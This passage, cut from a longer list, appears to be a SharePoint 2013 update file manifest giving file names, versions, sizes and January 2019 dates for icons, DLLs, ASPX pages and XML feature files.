\nltgbwher.gif| ltgbwher.gif| | 422| 30-Jan-19| 02:28 \nltgen.png| ltgen.png| | 195| 30-Jan-19| 02:28 \nltil.png| ltil.png| | 543| 30-Jan-19| 02:28 \nltime.png| ltime.png| | 346| 30-Jan-19| 02:28 \nltiss.png| ltiss.png| | 1426| 30-Jan-19| 02:28 \nltissue.png| ltissue.png| | 681| 30-Jan-19| 02:28 \nltlink.png| ltlink.png| | 2074| 30-Jan-19| 02:28 \nltobject.png| ltobject.png| | 821| 30-Jan-19| 02:28 \nltposts.gif| ltposts.gif| | 385| 30-Jan-19| 02:28 \nltsurvey.png| ltsurvey.png| | 225| 30-Jan-19| 02:28 \nlttask.png| lttask.png| | 1176| 30-Jan-19| 02:28 \nltthgbrg.png| ltthgbrg.png| | 754| 30-Jan-19| 02:28 \nltwp.png| ltwp.png| | 706| 30-Jan-19| 02:28 \nmb_video.png| mb_video.png| | 209| 30-Jan-19| 02:27 \nmappushpin.25x39x32.png| mappushpin.25x39x32.png| | 1070| 30-Jan-19| 02:28 \nmappushpindisabled.25x39x32.png| mappushpindisabled.25x39x32.png| | 1026| 30-Jan-19| 02:28 \nmappushpinhover.25x39x32.png| mappushpinhover.25x39x32.png| | 1037| 30-Jan-19| 02:28 \nmapview.31x22x32.png| mapview.31x22x32.png| | 672| 30-Jan-19| 02:28 \nmb_button_bg.png| mb_button_bg.png| | 194| 30-Jan-19| 02:27 \nmention.11x11x32.png| mention.11x11x32.png| | 274| 30-Jan-19| 02:28 \nmtagnda.png| mtagnda.png| | 413| 30-Jan-19| 02:28 \nmtann.png| mtann.png| | 520| 30-Jan-19| 02:28 \nmtappcat.png| mtappcatalog.png| | 414| 30-Jan-19| 02:28 \nmtappreq.png| mtapprequests.png| | 548| 30-Jan-19| 02:28 \nmtcat.gif| mtcat.gif| | 197| 30-Jan-19| 02:28 \nmtcommcat.png| mtcommcat.png| | 330| 30-Jan-19| 02:28 \nmtcommem.png| mtcommem.png| | 388| 30-Jan-19| 02:28 \nmtcommnt.gif| mtcommnt.gif| | 193| 30-Jan-19| 02:28 \nmtcontct.gif| mtcontct.gif| | 137| 30-Jan-19| 02:28 \nmtcontct.png| mtcontct.png| | 293| 30-Jan-19| 02:28 \nmtdatash.png| mtdatash.png| | 129| 30-Jan-19| 02:28 \nmtdecis.png| mtdecis.png| | 516| 30-Jan-19| 02:28 \nmtdisc.png| mtdisc.png| | 307| 30-Jan-19| 02:28 \nmtdl.png| mtdl.png| | 252| 30-Jan-19| 02:28 \nmtebl.png| mtebl.png| | 245| 30-Jan-19| 02:28 \nmtevent.png| mtevent.png| | 135| 30-Jan-19| 02:28 \nmtfl.png| mtfl.png| | 227| 30-Jan-19| 02:28 \nmtgbcall.gif| mtgbcall.gif| | 396| 30-Jan-19| 02:28 \nmtgbfaci.gif| mtgbfaci.gif| | 377| 30-Jan-19| 02:28 \nmtgbwher.gif| mtgbwher.gif| | 390| 30-Jan-19| 02:28 \nmtgen.png| mtgen.png| | 129| 30-Jan-19| 02:28 \nmtil.png| mtil.png| | 280| 30-Jan-19| 02:28 \nmtime.png| mtime.png| | 188| 30-Jan-19| 02:28 \nmtiss.png| mtiss.png| | 534| 30-Jan-19| 02:28 \nmtissue.png| mtissue.png| | 447| 30-Jan-19| 02:28 \nmtlink.png| mtlink.png| | 565| 30-Jan-19| 02:28 \nmtobject.png| mtobject.png| | 460| 30-Jan-19| 02:28 \nmtposts.gif| mtposts.gif| | 197| 30-Jan-19| 02:28 \nmtsurvey.png| mtsurvey.png| | 141| 30-Jan-19| 02:28 \nmttask.png| mttask.png| | 405| 30-Jan-19| 02:28 \nmtthgbrg.png| mtthgbrg.png| | 526| 30-Jan-19| 02:28 \nmtwp.png| mtwp.png| | 391| 30-Jan-19| 02:28 \nmb_file.png| mb_file.png| | 215| 30-Jan-19| 02:27 \nnowfollowing.11x11x32.png| nowfollowing.11x11x32.png| | 257| 30-Jan-19| 02:28 \no365brandsuite.png| o365brandsuite.png| | 2122| 30-Jan-19| 02:28 \npersonplaceholder200.png| personplaceholder.200x150x32.png| | 2438| 30-Jan-19| 02:28 \npersonplaceholder32.png| personplaceholder.32x32x32.png| | 737| 30-Jan-19| 02:28 \npersonplaceholder42.png| personplaceholder.42x42x32.png| | 728| 30-Jan-19| 02:28 \npersonplaceholder96.png| personplaceholder.96x96x32.png| | 1500| 30-Jan-19| 02:28 \nprojectmanagedeliverables.16x16x32.png| projectmanagedeliverables.16x16x32.png| | 219| 30-Jan-19| 02:28 \npromotedsitetile.150x150x32.png| promotedsitetile.150x150x32.png| | 2530| 30-Jan-19| 02:28 \nrepliedto.11x11x32.png| repliedto.11x11x32.png| | 257| 30-Jan-19| 02:28 \nmb_excel.png| mb_excel.png| | 572| 30-Jan-19| 02:27 \nmb_onenote.png| mb_onenote.png| | 456| 30-Jan-19| 02:27 \nmb_text.png| mb_text.png| | 268| 30-Jan-19| 02:27 \nmb_ppt.png| mb_ppt.png| | 577| 30-Jan-19| 02:27 \nmb_word.png| mb_word.png| | 535| 30-Jan-19| 02:27 \nmb_site.png| mb_siteworkspace.png| | 822| 30-Jan-19| 02:27 \nselectioncheckmarkcolumn.10x10x32.png| selectioncheckmarkcolumn.10x10x32.png| | 229| 30-Jan-19| 02:28 \nsharepointfoundation16.png| sharepointfoundation16.png| | 560| 30-Jan-19| 02:28 \nfavicon.ico| favicon.ico| | 7886| 30-Jan-19| 02:28 \nsharepointdesigner32.png| sharepointdesigner32.png| | 1613| 30-Jan-19| 02:28 \nsharepointmetroapptile.png| sharepointmetroapptile.png| | 3992| 30-Jan-19| 02:28 \nsiteicon.png| siteicon.png| | 2345| 30-Jan-19| 02:28 \naccsrv.images.progcircle16.gif| hig_progcircle_loading16.gif| | 420| 30-Jan-19| 02:27 \nloadingcirclests16.gif| loadingcirclests16.gif| | 420| 30-Jan-19| 02:27 \naccsrv.images.progcircle24.gif| hig_progcircle_loading24.gif| | 878| 30-Jan-19| 02:27 \ngears_anv4.gif_0001| gears_anv4.gif| | 878| 30-Jan-19| 02:27 \nloadin24.gif| hig_progcircle_loading24.gif| | 878| 30-Jan-19| 02:27 \nloadin24.png| hig_progcircle_loading24.gif| | 878| 30-Jan-19| 02:27 \nprogress_circle_24.gif| progress-circle-24.gif| | 878| 30-Jan-19| 02:27 \nmb_navigation.png| mb_navigation.png| | 255| 30-Jan-19| 02:27 \nspstorefrontappdefault.16x16x32.png| spstorefrontappdefault.16x16x32.png| | 296| 30-Jan-19| 02:28 \nspstorefrontappdefault.96x96x32.png| spstorefrontappdefault.96x96x32.png| | 1036| 30-Jan-19| 02:28 \ntag.11x11x32.png| tag.11x11x32.png| | 228| 30-Jan-19| 02:28 \nupdatelink.16x16x32.png| updatelink.16x16x32.png| | 320| 30-Jan-19| 02:28 \nusquig.png| usersquiggle.png| | 150| 30-Jan-19| 02:28 \nvideopreview.png| videopreview.png| | 7110| 30-Jan-19| 02:28 \nmb_page.png| mb_page.png| | 710| 30-Jan-19| 02:27 \nmb_xml.png| mb_xml.png| | 464| 30-Jan-19| 02:27 \nbusdata.dll| microsoft.businessdata.dll| 15.0.4420.1017| 116920| 27-Jan-19| 11:05 \nbusdatar.dll| microsoft.businessdata.dll| 15.0.4420.1017| 116920| 27-Jan-19| 11:05 \nmicrosoft_web_design_server.dll| microsoft.web.design.server.dll| 15.0.5085.1000| 402208| 27-Jan-19| 11:06 \nmicrosoft_web_design_server_intl.dll| microsoft.web.design.server.intl.dll| 15.0.4420.1017| 21640| 27-Jan-19| 11:06 \nbdcmdsch.xsd| bdcmetadata.xsd| | 26300| | \nbdcmeta.xsd| bdcmetadata.xsd| | 26300| 27-Jan-19| 11:05 \nbdcmdsc2.xsd| bdcmetadataresource.xsd| | 13089| | \nbdcmetar.xsd| bdcmetadataresource.xsd| | 13089| 27-Jan-19| 11:05 \nonetnative.dll| onetnative.dll| 15.0.4919.1000| 523008| 27-Jan-19| 11:06 \nxlsrv.onetnative.dll| onetnative.dll| 15.0.4919.1000| 523008| 27-Jan-19| 11:06 \nonetutil.dll| onetutil.dll| 15.0.5111.1000| 2625320| 27-Jan-19| 11:10 \noffice_extension_manager_js| sp.officeextensionmanager.js| | 34379| 27-Jan-19| 11:06 \nosfserver_client_dll| microsoft.sharepoint.client.workflowservices.dll| 15.0.4599.1000| 39128| 27-Jan-19| 11:06 \nosfserver_silverlight_dll| microsoft.sharepoint.client.workflowservices.silverlight.dll| 15.0.4599.1000| 39152| 27-Jan-19| 11:06 \nosfserver_serverproxy_dll| microsoft.sharepoint.workflowservices.serverproxy.dll| 15.0.4599.1000| 110280| 27-Jan-19| 11:06 \nosfserver_shared_dll| microsoft.sharepoint.workflowservicesbase.dll| 15.0.4877.1000| 88360| 27-Jan-19| 11:06 \nosfserver_shared_dll_intl| microsoft.sharepoint.workflowservicesbase.intl.dll| 15.0.4420.1017| 12464| 27-Jan-19| 11:06 \nproxylibrary.osfserver.xml| proxylibrary.osfserver.xml| | 164| 27-Jan-19| 11:06 \nosfserver_clientdbg_js| sp.workflowservices.debug.js| | 58451| 27-Jan-19| 11:06 \nosfserver_clientdbg_js.x64| sp.workflowservices.debug.js| | 58451| 27-Jan-19| 11:06 \nosfserver_client_js| sp.workflowservices.js| | 34083| 27-Jan-19| 11:06 \nosfserver_client_js.x64| sp.workflowservices.js| | 34083| 27-Jan-19| 11:06 \naddwrkfl.aspx| addwrkfl.aspx| | 61362| 27-Jan-19| 11:06 \nassocwrkfl.aspx| assocwrkfl.aspx| | 4655| 27-Jan-19| 11:06 \navailableworkflow.aspx| availableworkflow.aspx| | 7966| 27-Jan-19| 11:06 \nmytasks.aspx| mytasks.aspx| | 6818| 27-Jan-19| 11:06 \noextnmgr.aspx| officeextensionmanager.aspx| | 2196| 27-Jan-19| 11:06 \nremwrkfl.aspx| remwrkfl.aspx| | 16619| 27-Jan-19| 11:06 \nosfserver.resx| osfserver.resx| | 45025| 27-Jan-19| 11:06 \nrunningworkflows.aspx| runningworkflows.aspx| | 8570| 27-Jan-19| 11:06 \nvalidapp.osfsrv.xml| validappendpoints.osfserver.xml| | 1245| 27-Jan-19| 11:06 \nwfstart.asx| wfstart.aspx| | 202| 27-Jan-19| 11:06 \nworkflow.asx| workflow.aspx| | 25914| 27-Jan-19| 11:06 \nworkflowtaskpane.aspx| workflowtaskpane.aspx| | 1180| 27-Jan-19| 11:06 \nwrksetng.aspx| wrksetng.aspx| | 15843| 27-Jan-19| 11:06 \nwrkstat.aspx| wrkstat.aspx| | 27940| 27-Jan-19| 11:06 \nosfextap.dll| microsoft.sharepoint.officeextension.applicationpages.dll| 15.0.4420.1017| 12960| 27-Jan-19| 11:06 \nwfform.js| wfformtemplates.js| | 5024| 27-Jan-19| 11:06 \nosfap.dll| microsoft.sharepoint.workflowservices.applicationpages.dll| 15.0.4755.1000| 96880| 27-Jan-19| 11:06 \nwebconfig.osfserver.xml| webconfig.osfserver.xml| | 504| 27-Jan-19| 11:06 \naddgallery.xap_silverlight| addgallery.xap| | 367086| 27-Jan-19| 11:07 \nmicrosoft.sharepoint.client.xap| microsoft.sharepoint.client.xap| | 228025| 27-Jan-19| 11:06 \nwsstlb.net| microsoft.sharepoint.search.administration.mssitlb.dll| | 90792| 27-Jan-19| 11:07 \nsearchom.dll_0003| microsoft.sharepoint.search.dll| 15.0.5007.1000| 3599624| 27-Jan-19| 11:07 \nsearchom.dll_0005| microsoft.sharepoint.search.dll| 15.0.5007.1000| 3599624| 27-Jan-19| 11:07 \nsrchomnt.dll_1| microsoft.sharepoint.search.native.dll| 15.0.5085.1000| 479512| 27-Jan-19| 11:07 \nwsrchps.dll| microsoft.sharepoint.search.powershell.dll| 15.0.4937.1000| 31520| 27-Jan-19| 11:07 \ncontrol_defaultresult.js| control_searchresults.js| | 32178| 27-Jan-19| 11:06 \nfilter_refinement.js| filter_default.js| | 21014| 27-Jan-19| 11:06 \nfilter_multirefinement.js| filter_multivalue.js| | 6263| 27-Jan-19| 11:06 \ngroup_content.js| group_content.js| | 2159| 27-Jan-19| 11:06 \ngroup_defaultgroup.js| group_default.js| | 6616| 27-Jan-19| 11:06 \nhoverpanel_commonactions.js| item_commonhoverpanel_actions.js| | 12766| 27-Jan-19| 11:06 \nhoverpanel_commonbody.js| item_commonhoverpanel_body.js| | 7771| 27-Jan-19| 11:06 \nhoverpanel_community.js| item_community_hoverpanel.js| | 11080| 27-Jan-19| 11:06 \nhoverpanel_default.js| item_default_hoverpanel.js| | 4222| 27-Jan-19| 11:06 \nhoverpanel_microblog.js| item_microblog_hoverpanel.js| | 17457| 27-Jan-19| 11:06 \nhoverpanel_site.js| item_site_hoverpanel.js| | 7582| 27-Jan-19| 11:06 \nhoverpanel_webpage.js| item_webpage_hoverpanel.js| | 6608| 27-Jan-19| 11:06 \nitem_commonbody.js| item_commonitem_body.js| | 8742| 27-Jan-19| 11:06 \nitem_communityportal.js| item_communityportal.js| | 9225| 27-Jan-19| 11:06 \nitem_microblog.js| item_microblog.js| | 17108| 27-Jan-19| 11:06 \nitem_pdf.js| item_pdf.js| | 4102| 27-Jan-19| 11:06 \nitem_people.js| item_person.js| | 24413| 27-Jan-19| 11:06 \nitem_peopleintent.js| item_person_compacthorizontal.js| | 27705| 27-Jan-19| 11:06 \nitem_site.js| item_site.js| | 4544| 27-Jan-19| 11:06 \nitem_webpage.js| item_webpage.js| | 3827| 27-Jan-19| 11:06 \nitem_word.js| item_word.js| | 4157| 27-Jan-19| 11:06 \nsearch.web.parts.feature.xml| feature.xml| | 5405| 27-Jan-19| 11:06 \nsearch.web.parts.dwpfiles.xml| webpartdwpfiles.xml| | 68278| 27-Jan-19| 11:06 \nwss.searchpowershell.types.ps1xml| wsssearchpowershell.types.ps1xml| | 10901| 27-Jan-19| 11:07 \nwss.intl.dll| microsoft.sharepoint.search.intl.dll| 15.0.4937.1000| 570184| 27-Jan-19| 11:07 \nsetup.exe| setup.exe| 15.0.5111.1000| 1087056| 27-Jan-19| 11:04 \nsvrsetup.exe| setup.exe| 15.0.5111.1000| 1087056| 27-Jan-19| 11:04 \nwsssetup.dll| wsssetup.dll| 15.0.5111.1000| 10412352| 27-Jan-19| 11:10 \ndevftr.xml| feature.xml| | 1225| 27-Jan-19| 11:06 \nappdev.dll| microsoft.sharepoint.appdevelopment.dll| 15.0.5027.1000| 71384| 27-Jan-19| 11:06 \nstsapa.dll| microsoft.sharepoint.applicationpages.administration.dll| 15.0.5085.1000| 659224| 27-Jan-19| 11:06 \nwssadmop.dll_0001| microsoft.sharepoint.administrationoperation.dll| 15.0.4987.1000| 1046352| 27-Jan-19| 11:06 \nwssadmin.exe_0001| wssadmin.exe| 15.0.4420.1017| 17088| 27-Jan-19| 11:06 \nappmng.svc| appmng.svc| | 375| 27-Jan-19| 11:06 \nappmngclient.config| client.config| | 2159| 27-Jan-19| 11:06 \nappmngweb.config| web.config| | 2641| 27-Jan-19| 11:06 \nbgximg.png| bgximg.png| | 1770| 27-Jan-19| 11:06 \nbgyimg.png| bgyimg.png| | 68| 27-Jan-19| 11:06 \nclient.svc| client.svc| | 402| 27-Jan-19| 11:06 \nadmwcfg.xml| adminwebconfig.sts.xml| | 3530| 27-Jan-19| 11:06 \napppermissionprovider.bdcconnection.xml| apppermissionprovider.bdcconnection.xml| | 232| 27-Jan-19| 11:06 \napppermissionprovider.content.xml| apppermissionprovider.content.xml| | 706| 27-Jan-19| 11:06 \ncapabilitycheckers.sts.xml| capabilitycheckers.sts.xml| | 2789| 27-Jan-19| 11:06 \ndocexflt.xml| docextflt.xml| | 4439| 27-Jan-19| 11:06 \ndocparse.xml| docparse.xml| | 2293| 27-Jan-19| 11:06 \ngbwupgrade.xml| gbwupgrade.xml| | 4055| 27-Jan-19| 11:07 \ngbwupgradeb2b.xml| gbwupgradeb2b.xml| | 311| 27-Jan-19| 11:07 \nmdocview.xml| mdocview.xml| | 6975| 27-Jan-19| 11:06 \nmpsupgrade.xml| mpsupgrade.xml| | 15459| 27-Jan-19| 11:07 \nmpsupgradeb2b.xml| mpsupgradeb2b.xml| | 102| 27-Jan-19| 11:07 \nmredirection.xml| mredirection.xml| | 4660| 27-Jan-19| 11:06 \nproxylibrary.stsom.xml| proxylibrary.stsom.xml| | 217| 27-Jan-19| 11:06 \nrgnldflt.xml| rgnldflt.xml| | 81253| 27-Jan-19| 11:06 \ntaupgrade.xml| tenantadminupgrade.xml| | 437| 27-Jan-19| 11:07 \ntimezone.xml| timezone.xml| | 99866| 27-Jan-19| 11:06 \nwebconfig_identitymodel_add| webconfig.identitymodel.add.xml| | 7529| 27-Jan-19| 11:06 \nwebconfig_identitymodel_remove| webconfig.identitymodel.remove.xml| | 3122| 27-Jan-19| 11:06 \nwssupgrade.xml| wssupgrade.xml| | 9043| 27-Jan-19| 11:07 \nwssupgradeb2b.xml| wssupgradeb2b.xml| | 4719| 27-Jan-19| 11:07 \noleprsx.dll| oleparser.dll| 15.0.4454.1000| 31880| 27-Jan-19| 11:06 \nmicrosoft_sharepoint_dsp.dll| microsoft.sharepoint.dsp.dll| 15.0.4420.1017| 48248| 27-Jan-19| 11:07 \nmicrosoft_sharepoint_dsp_oledb.dll| microsoft.sharepoint.dsp.oledb.dll| 15.0.4420.1017| 112768| 27-Jan-19| 11:07 \nmicrosoft_sharepoint_dsp_soappt.dll| microsoft.sharepoint.dsp.soappt.dll| 15.0.4420.1017| 75912| 27-Jan-19| 11:07 \nmicrosoft_sharepoint_dsp_sts.dll| microsoft.sharepoint.dsp.sts.dll| 15.0.4420.1017| 93312| 27-Jan-19| 11:07 \nmicrosoft_sharepoint_dsp_xmlurl.dll| microsoft.sharepoint.dsp.xmlurl.dll| 15.0.4420.1017| 75912| 27-Jan-19| 11:07 \nschema.xml_accreq| schema.xml| | 21500| 27-Jan-19| 11:06 \naccreq.xml| accessrequests.xml| | 681| 27-Jan-19| 11:06 \nfeature.xml_accreq| feature.xml| | 497| 27-Jan-19| 11:06 \napplications.xml| applications.xml| | 8249| 27-Jan-19| 11:06 \napps.xml| apps.xml| | 3078| 27-Jan-19| 11:06 \nbackups.xml| backups.xml| | 4398| 27-Jan-19| 11:06 \nconfigurationwizards.xml| configurationwizards.xml| | 912| 27-Jan-19| 11:06 \ndefault.xml| default.xml| | 12609| 27-Jan-19| 11:06 \nfeature.xml_sts| feature.xml| | 1712| 27-Jan-19| 11:06 \ngenappsettings.xml| generalapplicationsettings.xml| | 1989| 27-Jan-19| 11:06 \nmonitoring.xml| monitoring.xml| | 3736| 27-Jan-19| 11:06 \no365configuration.xml| office365configuration.xml| | 405| 27-Jan-19| 11:06 \nquicklaunch.xml| quicklaunch.xml| | 555| 27-Jan-19| 11:06 \nsecurity.xml| security.xml| | 5954| 27-Jan-19| 11:06 \nsystemsettings.xml| systemsettings.xml| | 5280| 27-Jan-19| 11:06 \nupgradeandmigration.xml| upgradeandmigration.xml| | 1630| 27-Jan-19| 11:06 \nschema.xml_announce| schema.xml| | 26227| 27-Jan-19| 11:06 \nannounce.xml| announcements.xml| | 456| 27-Jan-19| 11:06 \nfeature.xml_announce| feature.xml| | 500| 27-Jan-19| 11:06 \napplockdown.xml| applockdown.xml| | 2321| 27-Jan-19| 11:06 \nfeature.xml_apploc| feature.xml| | 400| 27-Jan-19| 11:06 \nappreglinks.xml| appregistrationlinks.xml| | 793| 27-Jan-19| 11:06 \nfeature.xml_appreg| feature.xml| | 554| 27-Jan-19| 11:06 \nschema.xml_apprequestslist| schema.xml| | 10229| 27-Jan-19| 11:06 \napprequestscontenttypes.xml_apprequestslist| apprequestscontenttypes.xml| | 1748| 27-Jan-19| 11:06 \napprequestsfields.xml_apprequestslist| apprequestsfields.xml| | 5336| 27-Jan-19| 11:06 \napprequestslistinstance.xml_apprequestslist| apprequestslistinstance.xml| | 403| 27-Jan-19| 11:06 \napprequestslisttemplate.xml_apprequestslist| apprequestslisttemplate.xml| | 627| 27-Jan-19| 11:06 \nfeature.xml_apprequestslist| feature.xml| | 1516| 27-Jan-19| 11:06 \nautohostedlicensing_fields.xml_autohostedapplicensing| autohostedapplicensingfields.xml| | 771| 27-Jan-19| 11:06 \nfeature.xml_autohostedapplicensing| feature.xml| | 744| 27-Jan-19| 11:06 \nautohostedlicensing_controls.xml_autohostedapplicensing| resourcebar.xml| | 412| 27-Jan-19| 11:06 \nfeature.xml_autohostedapplicensingstapling| feature.xml| | 487| 27-Jan-19| 11:06 \nelements.xml_autohostedapplicensingstapling| staplingelements.xml| | 223| 27-Jan-19| 11:06 \nblog.dwp_admintools| blogadmin.dwp| | 468| 27-Jan-19| 11:06 \nblog.dwp_archives| blogarchives.dwp| | 462| 27-Jan-19| 11:06 \nblog.webpart_notifications| blognotifications.webpart| | 883| 27-Jan-19| 11:06 \nelements.xml_basicwebparts| elements.xml| | 1652| 27-Jan-19| 11:06 \nelements14.xml_basicwebparts| elements14.xml| | 629| 27-Jan-19| 11:06 \nelements15.xml_basicwebparts| elements15.xml| | 1407| 27-Jan-19| 11:06 \nfeature.xml_basicwebparts| feature.xml| | 3149| 27-Jan-19| 11:06 \ngettingstarted.webpart_basicwebparts| gettingstarted.webpart| | 834| 27-Jan-19| 11:06 \nmscontenteditor.dwp_basicwebparts| mscontenteditor.dwp| | 506| 27-Jan-19| 11:06 \nmsimage.dwp_basicwebparts| msimage.dwp| | 483| 27-Jan-19| 11:06 \nmsmembers.dwp_basicwebparts| msmembers.dwp| | 487| 27-Jan-19| 11:06 \nmspageviewer.dwp_basicwebparts| mspageviewer.dwp| | 498| 27-Jan-19| 11:06 \nmspiclibslideshow.webpart_basicwebparts| mspicturelibraryslideshow.webpart| | 733| 27-Jan-19| 11:06 \nmsscripteditor.webpart_basicwebparts| msscripteditor.webpart| | 739| 27-Jan-19| 11:06 \nmssimpleform.dwp_basicwebparts| mssimpleform.dwp| | 799| 27-Jan-19| 11:06 \nmsuserdocs.dwp_basicwebparts| msuserdocs.dwp| | 492| 27-Jan-19| 11:06 \nmsusertasks.dwp_basicwebparts| msusertasks.dwp| | 495| 27-Jan-19| 11:06 \nmsxml.dwp_basicwebparts| msxml.dwp| | 475| 27-Jan-19| 11:06 \nsilverlight.webpart_basicwebparts| silverlight.webpart| | 669| 27-Jan-19| 11:06 \ntimeline.webpart_basicwebparts| timeline.webpart| | 831| 27-Jan-19| 11:06 \nextsubsh_feature.xml| feature.xml| | 570| 27-Jan-19| 11:06 \nallcategories.asp_blog_categories| allcategories.aspx| | 2718| 27-Jan-19| 11:06 \neditcategory.asp_blog_categories| editcategory.aspx| | 4167| 27-Jan-19| 11:06 \nmycategories.asp_blog_categories| mycategories.aspx| | 2718| 27-Jan-19| 11:06 \nnewcategory.asp_blog_categories| newcategory.aspx| | 4197| 27-Jan-19| 11:06 \nschema.xml_blog_categories| schema.xml| | 18153| 27-Jan-19| 11:06 \nviewcategory.asp_blog_categories| viewcategory.aspx| | 4190| 27-Jan-19| 11:06 \nallcomments.asp_blog_comments| allcomments.aspx| | 2718| 27-Jan-19| 11:06 \nbyauthor.asp_blog_comments| byauthor.aspx| | 2718| 27-Jan-19| 11:06 \neditcomment.asp_blog_comments| editcomment.aspx| | 4167| 27-Jan-19| 11:06 \nmycomments.asp_blog_comments| mycomments.aspx| | 2718| 27-Jan-19| 11:06 \nnewcomment.asp_blog_comments| newcomment.aspx| | 4197| 27-Jan-19| 11:06 \nschema.xml_blog_comments| schema.xml| | 35968| 27-Jan-19| 11:06 \nviewcomment.asp_blog_comments| viewcomment.aspx| | 4190| 27-Jan-19| 11:06 \nallposts.asp_blog_posts| allposts.aspx| | 2718| 27-Jan-19| 11:06 \narchive.asp_blog_posts| archive.aspx| | 2718| 27-Jan-19| 11:06 \nbyauthor.asp_blog_posts| byauthor.aspx| | 2718| 27-Jan-19| 11:06 \nbycategory.asp_blog_posts| bycategory.aspx| | 2718| 27-Jan-19| 11:06 \ncalendar.asp_blog_posts| calendar.aspx| | 2718| 27-Jan-19| 11:06 \neditpost.asp_blog_posts| editpost.aspx| | 4167| 27-Jan-19| 11:06 \nmyposts.asp_blog_posts| myposts.aspx| | 2718| 27-Jan-19| 11:06 \nnewpost.asp_blog_posts| newpost.aspx| | 4197| 27-Jan-19| 11:06 \nschema.xml_blog_posts| schema.xml| | 81082| 27-Jan-19| 11:06 \nviewpost.asp_blog_posts| viewpost.aspx| | 4190| 27-Jan-19| 11:06 \nelements.xml_blog| elements.xml| | 1207| 27-Jan-19| 11:06 \nfeature.xml_blog| feature.xml| | 1326| 27-Jan-19| 11:06 \ncategory.asp_blogcon| category.aspx| | 2649| 27-Jan-19| 11:06 \ndate.asp_blog_blogcon| date.aspx| | 2643| 27-Jan-19| 11:06 \nelements.xml_blogcon| elements.xml| | 29090| 27-Jan-19| 11:06 \nfeature.xml_blogcon| feature.xml| | 517| 27-Jan-19| 11:06 \nmonthlyarchive.asp_blogcon| monthlyarchive.aspx| | 2737| 27-Jan-19| 11:06 \npost.asp_blogcon| post.aspx| | 3153| 27-Jan-19| 11:06 \nsummary.asp_blog_blogcon| summary.aspx| | 3200| 27-Jan-19| 11:06 \ndefault.asp_blog_bloghp| default.aspx| | 2682| 27-Jan-19| 11:06 \nelements.xml_bloghp| elements.xml| | 8483| 27-Jan-19| 11:06 \nfeature.xml_bloghp| feature.xml| | 501| 27-Jan-19| 11:06 \nschema.xml_calltrack| schema.xml| | 314515| 27-Jan-19| 11:06 \ncalltrack.xml| calltracklist.xml| | 5563| 27-Jan-19| 11:06 \nfeature.xml_calltrack| feature.xml| | 1178| 27-Jan-19| 11:06 \nschema.xml_circulation| schema.xml| | 313711| 27-Jan-19| 11:06 \ncirculation.xml| circulationlist.xml| | 6489| 27-Jan-19| 11:06 \nfeature.xml_circulation| feature.xml| | 1196| 27-Jan-19| 11:06 \nschema.xml_contacts| schema.xml| | 8715| 27-Jan-19| 11:06 \ncontacts.xml| contacts.xml| | 451| 27-Jan-19| 11:06 \nfeature.xml_contacts| feature.xml| | 480| 27-Jan-19| 11:06 \nsrcharea.xml| searcharea.xml| | 1279| 27-Jan-19| 11:06 \nfeature.xml_0004| feature.xml| | 527| 27-Jan-19| 11:06 \ncontenttypesettings.xml| contenttypesettings.xml| | 4678| 27-Jan-19| 11:06 \nfeature.xml_0010| feature.xml| | 537| 27-Jan-19| 11:06 \nschema.xml_corpcatalog| schema.xml| | 32074| 27-Jan-19| 11:06 \ncorporatecatalogcustomactions.xml_corpcatalog| corporatecatalogcustomactions.xml| | 8553| 27-Jan-19| 11:06 \ncorporatecatalogfields.xml_corpcatalog| corporatecatalogfields.xml| | 11303| 27-Jan-19| 11:06 \ncorporatecataloginstance.xml_corpcatalog| corporatecataloginstance.xml| | 422| 27-Jan-19| 11:06 \ncorporatecatalogtemplate.xml_corpcatalog| corporatecatalogtemplate.xml| | 665| 27-Jan-19| 11:06 \nfeature.xml_corpcatalog| feature.xml| | 2174| 27-Jan-19| 11:06 \nwebeventreceiver.xml_corpcatalog| webeventreceiver.xml| | 578| 27-Jan-19| 11:06 \nfeature.xml_corpgallerysettings| feature.xml| | 408| 27-Jan-19| 11:06 \nctypswss.xml| ctypeswss.xml| | 48192| 27-Jan-19| 11:06 \nctpswss2.xml| ctypeswss2.xml| | 26052| 27-Jan-19| 11:06 \nctpswss3.xml| ctypeswss3.xml| | 2093| 27-Jan-19| 11:06 \nfeature_0004.xml| feature.xml| | 3974| 27-Jan-19| 11:06 \nschema.xml_custom| schema.xml| | 3427| 27-Jan-19| 11:06 \ncustlist.xml| customlist.xml| | 442| 27-Jan-19| 11:06 \nfeature.xml_custom| feature.xml| | 479| 27-Jan-19| 11:06 \nschema.xml_dsl| schema.xml| | 4343| 27-Jan-19| 11:06 \ndsl.xml| datasourcelibrary.xml| | 512| 27-Jan-19| 11:06 \nfeature.xml_dsl| feature.xml| | 477| 27-Jan-19| 11:06 \nribbon.xml| ribbon.xml| | 4984| 27-Jan-19| 11:06 \nschema.xml_discuss| schema.xml| | 266868| 27-Jan-19| 11:06 \ndiscuss.xml| discussions.xml| | 1715| 27-Jan-19| 11:06 \nfeature.xml_discuss| feature.xml| | 1750| 27-Jan-19| 11:06 \neditdlg.htm_doclib| editdlg.htm| | 4892| 27-Jan-19| 11:06 \neditdlg.htm_ldoclib| editdlg.htm| | 4892| 27-Jan-19| 11:06 \neditdlg.htm_pubfeap| editdlg.htm| | 4892| 27-Jan-19| 11:06 \neditdlg.htm_pubresfeat| editdlg.htm| | 4892| 27-Jan-19| 11:06 \nreportcenterdoclibeditdlg_htm| editdlg.htm| | 4892| 27-Jan-19| 11:06 \nrleditdlg.htm| editdlg.htm| | 4892| 27-Jan-19| 11:06 \nfiledlg.htm_doclib| filedlg.htm| | 4754| 27-Jan-19| 11:06 \nfiledlg.htm_ldoclib| filedlg.htm| | 4754| 27-Jan-19| 11:06 \nfiledlg.htm_pubfeap| filedlg.htm| | 4754| 27-Jan-19| 11:06 \nfiledlg.htm_pubresfeat| filedlg.htm| | 4754| 27-Jan-19| 11:06 \nreportcenterdoclibfiledlg_htm| filedlg.htm| | 4754| 27-Jan-19| 11:06 \nrlfiledlg.htm_ldoclib| filedlg.htm| | 4754| 27-Jan-19| 11:06 \nrepair.aspx_doclib| repair.aspx| | 3259| 27-Jan-19| 11:06 \nrepair.aspx_ldoclib| repair.aspx| | 3259| 27-Jan-19| 11:06 \nrepair.aspx_pubfeap| repair.aspx| | 3259| 27-Jan-19| 11:06 \nrepair.aspx_pubresfeat| repair.aspx| | 3259| 27-Jan-19| 11:06 \nreportcenterdoclibrepair_aspx| repair.aspx| | 3259| 27-Jan-19| 11:06 \nreportcenterdoclibschema_xml| schema.xml| | 31199| 27-Jan-19| 11:06 \nschema.xml_doclib| schema.xml| | 31199| 